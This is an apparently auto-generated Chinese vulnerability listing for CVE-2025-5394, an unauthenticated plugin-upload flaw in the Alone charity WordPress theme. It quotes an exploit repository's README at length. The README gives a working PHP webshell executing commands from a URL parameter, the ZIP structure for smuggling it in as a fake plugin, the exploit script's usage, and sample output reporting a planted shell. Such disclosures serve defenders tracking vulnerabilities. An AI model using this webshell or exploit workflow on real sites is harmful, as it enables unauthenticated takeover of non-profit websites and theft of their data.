Alone – Charity Multipurpose Non-profit WordPress Theme 未授权任意文件上传漏洞

漏洞信息

漏洞名称: Alone – Charity Multipurpose Non-profit WordPress Theme 未授权任意文件上传漏洞

漏洞编号:

  • CVE: CVE-2025-5394

漏洞类型: 文件上传

漏洞等级: 严重

漏洞描述: Alone – Charity Multipurpose Non-profit WordPress Theme 是一款专为非盈利组织和慈善机构设计的WordPress主题,广泛用于搭建慈善、募捐和非盈利组织的网站。该主题提供了多种定制化选项和功能,以支持这些组织的在线活动和宣传。由于其易用性和功能性,它在非盈利组织中非常受欢迎。

该主题在7.8.3及之前的版本中存在一个未授权任意文件上传漏洞。这个漏洞的根源在于alone_import_pack_install_plugin()函数缺少对用户权限的检查,导致未经认证的攻击者可以上传任意ZIP文件(伪装成插件)到WordPress服务器。攻击者可以利用这一漏洞上传包含恶意代码的插件,进而实现远程代码执行。

此漏洞的安全风险极高,因为它允许攻击者无需任何认证即可上传和执行任意代码,可能导致网站被完全控制、数据泄露或服务中断。由于漏洞可以被自动化工具利用,攻击者可以大规模扫描和攻击存在漏洞的网站,增加了被利用的风险和潜在的影响范围。

产品名称: Alone – Charity Multipurpose Non-profit WordPress Theme

影响版本: <= 7.8.3

来源: https://github.com/Nxploited/CVE-2025-5394

类型: CVE-2025:github search

仓库文件

  • CVE-2025-5394.py
  • LICENSE
  • README.md
  • requirements.txt

来源概述

🚨 CVE-2025-5394 - Unauthenticated Arbitrary Plugin Upload in Alone Theme

📌 Affected Product:

Alone – Charity Multipurpose Non-profit WordPress Theme  
Versions: <= 7.8.3  
CVE: CVE-2025-5394  
CVSS Score: 9.8 (Critical)

🔥 Vulnerability Summary:

The Alone theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function.  
This flaw allows unauthenticated attackers to upload ZIP files (disguised as plugins) from remote locations, potentially achieving remote code execution.

⚙️ Exploit Script (Python)

This repository contains a Python script that automates the exploitation of CVE-2025-5394.  
The script triggers the vulnerable AJAX action and uploads a fake plugin (containing a webshell) directly to the WordPress server.

📁 Webshell Requirements:

The uploaded ZIP file must follow this structure:

1
2
3
shell_plugin.zip
└── shell_plugin
    └── shell_plugin.php

Where:

  • shell_plugin is the plugin directory.
  • shell_plugin.php is a valid PHP plugin file with a plugin header.
  • The PHP file can contain a webshell payload.

Example of minimal plugin header inside shell_plugin.php:

1
2
3
4
5
6
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>

🚀 Example Usage:

1
python3 CVE-2025-5394.py -help
1
2
3
4
5
6
7
8
usage: te.py [-h] -u URL -s SHELL

CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target WordPress site URL
  -s, --shell SHELL  ZIP file URL containing webshell (.zip)

✅ Successful Output:

1
2
3
4
5
6
7
python3 te.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target        : http://target.com/wordpress
[>] Shell URL     : http://target.com/shell.php
[>] Plugin Slug   : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL  : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php

⚠️ Disclaimer:

This script is provided for educational and research purposes only.  
The author is not responsible for any misuse or illegal activity conducted using this code.  
Use it only on systems you own or have explicit permission to test.

👨‍💻 By:

Nxploited ( Khaled Alenazi )  
GitHub: https://github.com/Nxploited

Github Poc
#文件上传 #CVE-2025:github search
Alone – Charity Multipurpose Non-profit WordPress Theme 未授权任意文件上传漏洞
http://example.com/2025/08/02/github_3388406966/
作者
lianccc
发布于
2025年8月2日
许可协议